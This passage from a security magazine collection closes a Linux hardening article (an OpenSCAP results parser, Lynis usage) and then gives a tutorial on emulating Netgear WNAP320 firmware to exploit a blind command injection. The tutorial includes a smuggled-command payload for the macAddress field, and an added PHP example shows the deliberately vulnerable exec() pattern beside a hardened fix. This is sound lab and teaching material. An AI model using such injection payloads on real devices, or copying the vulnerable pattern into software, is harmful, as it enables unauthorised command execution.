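As an added example (not from the article or the OpenSCAP project): a Python helper that reads the XML results oscap writes when you add --results results.xml to the command above, counts rule outcomes, groups failures by severity and applies a simple pass/fail gate of the kind you would put in a pipeline or fleet check. The TestResult document below is constructed to match that layout; the rule ids follow the SCAP Security Guide naming scheme, while the outcomes, score and gate thresholds are made up.

```python
"""Summarise an OpenSCAP XCCDF results file (added example, not the article's own code)."""
import xml.etree.ElementTree as ET
from collections import Counter

NS = {"x": "http://checklists.nist.gov/xccdf/1.2"}   # XCCDF 1.2 namespace used by oscap

# Constructed sample in the layout of the <TestResult> that `oscap xccdf eval --results`
# appends to the evaluated benchmark: nine rule results plus the default-model score.
SAMPLE_RESULTS = """\
<Benchmark xmlns="http://checklists.nist.gov/xccdf/1.2" id="xccdf_org.ssgproject.content_benchmark_RHEL-7">
  <TestResult id="xccdf_org.open-scap_testresult_xccdf_org.ssgproject.content_profile_pci-dss">
    <profile idref="xccdf_org.ssgproject.content_profile_pci-dss"/>
    <rule-result idref="xccdf_org.ssgproject.content_rule_sshd_disable_root_login" severity="medium"><result>pass</result></rule-result>
    <rule-result idref="xccdf_org.ssgproject.content_rule_package_telnet-server_removed" severity="high"><result>fail</result></rule-result>
    <rule-result idref="xccdf_org.ssgproject.content_rule_accounts_password_pam_minlen" severity="medium"><result>fail</result></rule-result>
    <rule-result idref="xccdf_org.ssgproject.content_rule_service_firewalld_enabled" severity="medium"><result>pass</result></rule-result>
    <rule-result idref="xccdf_org.ssgproject.content_rule_file_permissions_etc_shadow" severity="medium"><result>pass</result></rule-result>
    <rule-result idref="xccdf_org.ssgproject.content_rule_ensure_gpgcheck_globally_activated" severity="high"><result>pass</result></rule-result>
    <rule-result idref="xccdf_org.ssgproject.content_rule_disable_ctrlaltdel_reboot" severity="high"><result>pass</result></rule-result>
    <rule-result idref="xccdf_org.ssgproject.content_rule_set_password_hashing_algorithm_systemauth" severity="low"><result>fail</result></rule-result>
    <rule-result idref="xccdf_org.ssgproject.content_rule_service_autofs_disabled" severity="medium"><result>notapplicable</result></rule-result>
    <score system="urn:xccdf:scoring:default" maximum="100.000000">62.500000</score>
  </TestResult>
</Benchmark>
"""


def summarize_results(xml_text):
    """Count rule outcomes, list failed rules by severity and pull the benchmark score."""
    root = ET.fromstring(xml_text)
    test_result = root.find(".//x:TestResult", NS)
    if test_result is None:
        raise ValueError("no TestResult element; run oscap with --results to get one")
    by_outcome = Counter()
    failed_by_severity = Counter()
    failed_rules = []
    for rr in test_result.findall("x:rule-result", NS):
        outcome = (rr.findtext("x:result", default="", namespaces=NS) or "").strip()
        by_outcome[outcome] += 1
        if outcome == "fail":
            severity = rr.get("severity", "unknown")   # severity is an attribute of rule-result
            failed_by_severity[severity] += 1
            failed_rules.append((severity, rr.get("idref")))
    score_el = test_result.find("x:score", NS)
    score = float(score_el.text) if score_el is not None else None
    return {
        "by_outcome": dict(by_outcome),
        "failed_by_severity": dict(failed_by_severity),
        "failed_rules": failed_rules,
        "score": score,
    }


def meets_policy(summary, min_score=80.0, allowed_high_failures=0):
    """Gate: the score must reach min_score and high-severity failures must stay within budget."""
    high = summary["failed_by_severity"].get("high", 0)
    return (summary["score"] is not None
            and summary["score"] >= min_score
            and high <= allowed_high_failures)


if __name__ == "__main__":
    result = summarize_results(SAMPLE_RESULTS)
    print("outcomes:", result["by_outcome"])
    print("failed by severity:", result["failed_by_severity"])
    for severity, rule in sorted(result["failed_rules"]):
        print(f"  [{severity}] {rule}")
    print("score:", result["score"], "policy met:", meets_policy(result))
```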


LYNIS
Lynis is a tool for Linux and other Unix-like systems that checks a host for common hardening measures and gives feedback about their status. A hardening index is created, which sums up the hardening state in a single score. The tests and policies are written by CISOFY and are updated regularly. The tests are run from a command line interface, and CISOFY also offers a commercial version. Lynis can be extended with plugins.
To download, go to https://cisofy.com/download/lynis/
The following command runs all tests against our system without stopping to ask questions (-Q is quick mode, which does not wait for user input):

$ lynis audit system -Q

Now the tool conducts the system checks. You can see the tests that are being run and the status of the tests. It also
writes to the log file for further usage.

Figure 16: Lynis output

After Lynis has collected all results, you can see a short summary of this, which consists of the hardening index score,
the location of log files and some general info. Now it's up to you to decide whether you are satisfied with that
benchmark or want to improve the hardening posture.

Figure 17: Lynis summary

SUMMARY
The main goal of hardening is to reduce the attack surface and the privileges available in case of a successful attack. It can also help the early detection of attacks. Hence hardening has to be at the core of your security strategy. While implementing hardening, keep in mind the end users’ requirements, as hardening may impact their ability to work. Hardening has an impact across the defense-in-depth layers, as each layer requires similar steps but different measures. There are many tools and guides available to implement hardening for your specific environment and sector. These tools provide the ability to create a baseline and automate the hardening process. Most of the tools are free and can easily be incorporated into your SDLC.


ABOUT THE AUTHOR

Sumit Kumar Soni

I have more than 10 years of experience of working in the application and system security field. I specialize in the field of deep inspection and IDS/IPS testing and evasions. I have exposure to all areas of security, including reverse engineering, vulnerability research, exploit development, malware analysis and pen testing. I am a CISSP and have responsibly reported security vulnerabilities in various products. Currently I am working as QA Architect – Vulnerability Research with TrendMicro Canada.

You can reach me on Twitter: @sumit_uit or at https://www.linkedin.com/in/sumitksoni

REFERENCES

• CIS Benchmarks, https://benchmarks.cisecurity.org/
• NIST SP 800-53 Rev. 4, Security and Privacy Controls for Federal Information Systems and Organizations, http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf
• NIST SP 800-123, Guide to General Server Security, http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-123.pdf
• Microsoft – Baseline Server Hardening, https://technet.microsoft.com/en-us/library/cc526440.aspx
• AppLocker Overview, https://technet.microsoft.com/en-us/library/hh831409(v=ws.11).aspx
• OpenSCAP, https://www.open-scap.org/
• Lynis, https://cisofy.com/lynis/

EMULATING FIRMWARE FOR BLIND COMMAND INJECTION

by Nitesh Malviya

Emulating Firmware For Blind Command Injection

Hello everyone, and welcome.

In this article, we will learn how to emulate firmware in order to exploit a Blind Command Injection vulnerability in Netgear firmware. Let’s start.

The article has been divided in two parts:

First Part – Firmware emulation

Second Part – Exploiting command Injection

First Part

Firmware emulation

What is emulation?

Let’s understand the meaning of emulation in simple words. Suppose you get a firmware file (a .bin or .img) from some source, like the vendor’s official website, and you want to run it. How can you run it? There are two ways:

1. Hardware Emulation – In this, you get a hardware device, like a router, upload the firmware file onto the router and interact with the firmware via an interface. The issue with this method is that you always need a hardware device to run the firmware.
2. Software Emulation – In this, we use software instead of hardware. The software mounts the firmware and you interact with the firmware. The biggest advantage of this method is that you don’t need any hardware and you can run as many firmware images as you wish.
Let’s start firmware emulation using the software emulation method.

Tools

We can make use of the following tools for Software Emulation

1. QEMU – QEMU is the emulator used for emulating firmware. More info on QEMU can be obtained here – QEMU-INFO. For setting up QEMU please refer to QEMU-SETUP, and for a firmware emulation demo, QEMU-DEMO.
2. Firmware Analysis Toolkit (FAT) – FAT is the toolkit used for firmware emulation. It uses tools such as Firmadyne, Binwalk, Firmware Mod Kit, MITM Proxy and Firmwalker for emulation. Please refer to FAT for setting up FAT on your system. We will use this tool for exploiting blind command injection.


I hope you have set up FAT for firmware emulation. Please download the Netgear firmware for the demo.

Step by step procedure for firmware Emulation along with the screenshots:

Step 1 – Copy the Netgear firmware into the Firmadyne folder as shown:

Now you should have firmware file WNAP 320.zip and fat.py in the same folder. fat.py is the Python script which will
help us in emulating the firmware.

Step 2 – Run the fat.py script and enter the following information as highlighted:

After pressing enter, it will ask you for your password two or three times. Enter the same password you have used for
setting up firmadyne. In my case, the password is firmadyne, and after entering the password, wait for two minutes
and it will give you the IP address of the firmware as shown below:

Step 3 – Accessing via browser: Enter the IP address obtained in step 2. You may not be able to access the
firmware on your first attempt. Try it four or five times and you will get the firmware login page.

Step 4 – Log in with the username/password admin/password and you should be logged in as shown:


So this is how we emulate firmware using Firmadyne, and I hope you have also emulated the firmware by following
the steps above.

Second Part

Exploiting command Injection

We have emulated the firmware, and now we will exploit the Blind Command Injection vulnerability present in
it.

Here are the steps we will follow:

1. Extract the firmware for viewing the source code of the file present in the firmware.
2. Inspect source code for Blind Command Injection exploitation.
3. Request the file via Browser.
4. Intercept the HTTP request of the file via Proxy Tool (Burp Suite, Paros, etc.) and change the parameters.
5. Exploit Blind Command Injection.

Let’s start.

Extract the firmware using binwalk’s -e option (I have presented the whole process in my blog post called Reversing
Firmware for Extracting Hard-Coded Telnet Credentials) and follow the steps as highlighted in the screenshot:


We are now in the _rootfs.squashfs.extracted folder, which contains all the files present in the firmware. Next we need
to find the PHP files present in the firmware, which can be done with the command find . -name "*.php"

Command Explanation

find – name of the command

. – start searching from the current directory

-name "*.php" – match any file whose name ends with the .php extension

This command lists all the PHP files present in the firmware as shown:


One of the files, boardDataWW.php, asks for a MAC address as shown below. The file boardDataWW.php is
located in the home/www/ folder.

Let’s look at the source code of the boardDataWW.php file.

As highlighted, the macAddress parameter is passed to the exec call (2nd highlighted part) and the input is not filtered
(1st highlighted part). exec() is the PHP function used for executing OS commands. The input is taken as is, so we can
pass OS commands along with the macAddress parameter.
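To make the defect and its fix concrete, here is an added example that is not the source of Netgear’s boardDataWW.php: it reproduces the unsafe pattern the article describes (request parameter concatenated into an exec() command line) next to a hardened version. The helper binary /usr/sbin/board_tool and its flags are assumptions for illustration.

```php
<?php
// Added example (not Netgear's boardDataWW.php). /usr/sbin/board_tool and
// its flags are assumptions; only the pattern matters.

// VULNERABLE: the request parameter is concatenated into a shell command line.
// exec() hands the string to /bin/sh, so "001122334455 -c ; ls #" ends the
// intended command at ";" and runs "ls", while "#" comments out the rest.
// Only the fixed "Update Success!" text is returned, which is what makes the
// injection blind: the attacker sees no command output in the response.
function updateMacVulnerable(string $macAddress): string
{
    exec('/usr/sbin/board_tool ' . $macAddress . ' -c', $output, $rc);
    return 'Update Success!';
}

// HARDENED: allow-list validation first, then escapeshellarg() so that even a
// value that slips through reaches the helper as one quoted argument.
function updateMacHardened(string $macAddress): string
{
    // A MAC address on this form is exactly 12 hex digits; reject anything else
    // before any shell is spawned.
    if (!preg_match('/^[0-9A-Fa-f]{12}$/', $macAddress)) {
        http_response_code(400);
        return 'Invalid MAC address';
    }
    $cmd = '/usr/sbin/board_tool ' . escapeshellarg($macAddress) . ' -c';
    exec($cmd, $output, $rc);
    // Report the real exit status instead of a constant success string.
    return $rc === 0 ? 'Update Success!' : 'Update Failed';
}

// Self-check with the article's payload: the hardened handler rejects it
// without ever reaching exec().
$payload = '001122334455 -c ; ls #';
if (updateMacHardened($payload) !== 'Invalid MAC address') {
    fwrite(STDERR, "validation did not reject the payload\n");
    exit(1);
}
echo updateMacHardened($_POST['macAddress'] ?? ''), PHP_EOL;
```

Running it from the CLI exercises only the hardened path; a web server log that shows a 400 for the macAddress handler is the detection signal a defender would look for after this fix.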


Intercept all requests and responses from the Firefox browser. You can use Burp Suite, Paros, OWASP ZAP, etc. I am
using Burp Suite; the process for intercepting Firefox traffic can be found here – Burp-For-Firefox.

Intercept the Firefox request as shown:

Send this request to the Repeater tab by right-clicking on it and selecting the Repeater option. Now we can enter any
command in the macAddress field and check the response. Let’s enter 001122334455 -c ; ls # in the macAddress field.

Command Explanation:

; – Terminates the first command.

# – Whatever comes after # is treated as a comment.

So we are asking the exec function to execute mac_address_value -c ; our_command.


As seen, the response is Update Success! We were expecting a list of directories in the response, since we passed the
ls command, but we received Update Success instead. What does it mean? It means our command was executed
successfully but its result, i.e. the directory listing, was not returned to the browser. This is a typical example of
Blind Command Injection.

Let’s exploit the Blind Command Injection by writing the output of the ls command to a file as shown:

Now let’s access demo.txt from the browser and see the output:

Voila! It returns a list of all the files present in the firmware. Similarly, we can execute any OS command and read its
output from the demo.txt file.

That’s it. Here we end the article about Blind Command Injection. Thanks for reading.


About the author

Nitesh Malviya

Hello, everyone. I am Nitesh Malviya, working as a Security Consultant with Payatu Technologies in Pune. I have
experience in Web Appsec, VAPT and Mobile Appsec (only Android) and am currently working on Cloud and IoT
security. I am an active member of the null Mumbai chapter and blog at https://nitmalviya03.wordpress.com.
Last but not least, I am open to any opportunity in IoT and Cloud Security.
